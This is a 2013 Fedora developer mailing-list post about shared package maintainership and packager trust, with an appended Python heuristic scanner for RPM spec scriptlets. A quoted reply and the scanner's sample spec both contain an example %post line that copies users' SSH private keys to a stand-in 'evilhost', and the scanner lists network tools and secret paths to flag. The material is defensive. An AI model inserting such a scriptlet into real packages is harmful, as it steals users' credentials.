Question about "what to do if maintainer is absent"

Kevin Fenzi kevin at scrye.com
Tue May 14 20:20:40 UTC 2013


On Tue, 14 May 2013 21:04:59 +0100
"Richard W.M. Jones" <rjones at redhat.com> wrote:

> I suspect the main one is someone putting:
> 
> %post
> scp /home/*/.ssh/id_rsa evilhost:
> 
> into a commonly used package, or something equivalent but more subtle
> than that.
> 
> Basically you're giving root access to everyone with a FAS packager
> account (not that the current situation is that much better).

well, no, that's not what I was talking about, that is a completely
different issue. ;)

I was referring to the fact that if we had a collection of around 14,000
packages and a pool of around 1400 maintainers, and everyone just
wandered around working on whatever they liked, you would get X people
fixing the same bug and duplicating effort, X people talking to
upstream and telling them different things, X people figuring out a
problem and waiting for something to happen for a real solution and
someone else wandering in and fixing it in a poor/hacky way, X people
telling users one decision and Y people telling them another, etc.

If you have a small set of interested maintainers they can communicate
between the group and divide work and come to consensus. Things don't
scale to do that over the entire collection on every decision. 

To the issue you refer to above, it's already somewhat that you trust
anyone maintaining packages you install, but additionally, there's a
lot of reporting and logging that goes on, so if someone did do
something like this it could be detected and fixed. You already also
trust the upstreams for all the packages you install as well. 

kevin
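As an added illustration of the "it could be detected" point (my code, not from this thread or from Fedora's tooling): a small Python check that parses the scriptlet sections of an RPM spec file and flags lines that both touch user secret paths and invoke a tool that moves data off the host. The scriptlet names, the heuristic command and path lists, and the two sample specs are my assumptions, constructed for the example.

```python
import re

# Scriptlet sections an RPM spec may carry (list assumed for this example).
SCRIPTLET_RE = re.compile(
    r'^%(pre|post|preun|postun|pretrans|posttrans|triggerin|triggerun|triggerpostun)\b')
# Non-scriptlet sections that terminate a scriptlet body.
END_SECTIONS = {'%description', '%package', '%prep', '%build', '%install',
                '%check', '%clean', '%files', '%changelog'}
# Heuristics: tools that move data off the host, and paths holding user secrets.
NETWORK_CMDS = re.compile(r'(^|[\s;|&(])(scp|sftp|ssh|curl|wget|nc|ncat)\b')
SECRET_PATHS = re.compile(r'/home/|/root/|\.ssh/|\.gnupg/|/etc/shadow')

def scriptlets(spec_text):
    """Return a list of (scriptlet_name, body_lines) for every scriptlet in a spec."""
    found, name, body = [], None, []
    for line in spec_text.splitlines():
        first = line.split(maxsplit=1)[0] if line.strip() else ''
        m = SCRIPTLET_RE.match(line)
        if m or first in END_SECTIONS:
            if name is not None:
                found.append((name, body))
            name, body = (m.group(1), []) if m else (None, [])
        elif name is not None:
            body.append(line)
    if name is not None:
        found.append((name, body))
    return found

def suspicious_scriptlet_lines(spec_text):
    """Flag scriptlet lines that both touch secret paths and invoke a network tool."""
    hits = []
    for name, body in scriptlets(spec_text):
        for line in body:
            code = line.split('#', 1)[0]  # ignore trailing shell comments
            if NETWORK_CMDS.search(code) and SECRET_PATHS.search(code):
                hits.append((name, line.strip()))
    return hits

# Constructed sample specs: one carrying the scriptlet quoted in the thread, one clean.
SAMPLE_SPEC = """\
Name: example
Version: 1.0
%post
/sbin/ldconfig
scp /home/*/.ssh/id_rsa evilhost:
%files
/usr/bin/example
"""
CLEAN_SPEC = """\
Name: example
%post
%systemd_post example.service
/sbin/ldconfig
%files
/usr/bin/example
"""

if __name__ == '__main__':
    for name, line in suspicious_scriptlet_lines(SAMPLE_SPEC):
        print(f'%{name}: {line}')
```

A check like this belongs in review tooling rather than in the package build itself; it is a heuristic and will not catch the "more subtle" equivalents Richard mentions.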